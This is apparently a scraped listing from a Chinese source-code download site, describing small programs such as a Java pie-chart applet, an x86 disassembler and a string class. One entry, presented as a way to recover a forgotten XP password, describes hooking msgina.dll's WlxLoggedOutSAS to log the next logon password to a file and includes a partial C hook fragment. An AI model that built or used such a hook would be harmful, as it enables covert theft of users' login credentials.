-
这是一个java语言编写的,一个小小的applet程序,可以自动生成饼图。希望给想学习的同学有个小小的帮助。...
这是一个java语言编写的,一个小小的applet程序,可以自动生成饼图。希望给想学习的同学有个小小的帮助。-This is a java language, and a small applet program that can automatically generate a pie chart. Hope there classmates to want to learn a little help.
- 2022-04-22 01:10:24下载
- 积分:1
-
走进stl的内容,介绍了stl的各种功能.请各位
走进stl的内容,介绍了stl的各种功能.请各位-Near to the content of STL,introduce all kinds of function,please look through.
- 2022-02-13 05:24:08下载
- 积分:1
-
反汇编32位intel机器指令的源代码,只写完了80386的指令,没有加入后续指令及浮点指令,不过源代码考虑了可扩展性,可以很容易加入其它指令.由于我还不了解6...
反汇编32位intel机器指令的源代码,只写完了80386的指令,没有加入后续指令及浮点指令,不过源代码考虑了可扩展性,可以很容易加入其它指令.由于我还不了解64位的汇编指令,所以没考虑对64位的扩展.反汇编的结果经与W32DASM对比,发现了W32DASM的许多错误,如果发现我的源码译错了请email我(只限80386指令),我的email在源代码文件中-compilation of 32 anti-intel machinery orders source code, only 80,386 finished the instructions not to include follow-up instructions and floating-point instructions, but the source code to consider the scalability, it is very easy to join other directives. Since I do not yet know the compilation of 64 instructions, we had to consider the right 64 expansion. anti-compile the results contrast with the W32DASM found W32DASM many mistakes, I found the source code translation wrong Please email me (only 80,386 directive), I email the source document
- 2022-03-21 08:58:10下载
- 积分:1
-
山农定理得VC++ 完美程序。大家多多交流
山农定理得VC++ 完美程序。大家多多交流-Shannong theorem was VC++ Perfect procedures. U.S. more exchanges
- 2023-04-10 12:55:34下载
- 积分:1
-
WINCE下输入法的接口的简单实现.
选自programs windows ce
WINCE下输入法的接口的简单实现.
选自programs windows ce
-WINCE imported under the law to achieve a simple interface. From programs windows ce
- 2022-02-10 13:13:20下载
- 积分:1
-
信息论书。
Information theory book.
An instant classic, covering everything from Shannon s fundamental theorems to the postmodern theory of LDPC codes.
- 2022-01-28 01:27:41下载
- 积分:1
-
redeem an alternative string class CStdStr
一个可替代CString的字符串类CStdStr-redeem an alternative string class CStdStr
- 2023-08-21 12:10:03下载
- 积分:1
-
VC++ 云台摄像头控制程序源代码
VC++ 云台摄像头控制程序源代码。控制云台和镜头。。
- 2022-02-11 21:23:52下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
将VB格式文件转换为Unix格式文件,小程序代码.
将VB格式文件转换为Unix格式文件,小程序代码.-VB format will be converted to Unix format, small code.
- 2022-07-05 02:55:04下载
- 积分:1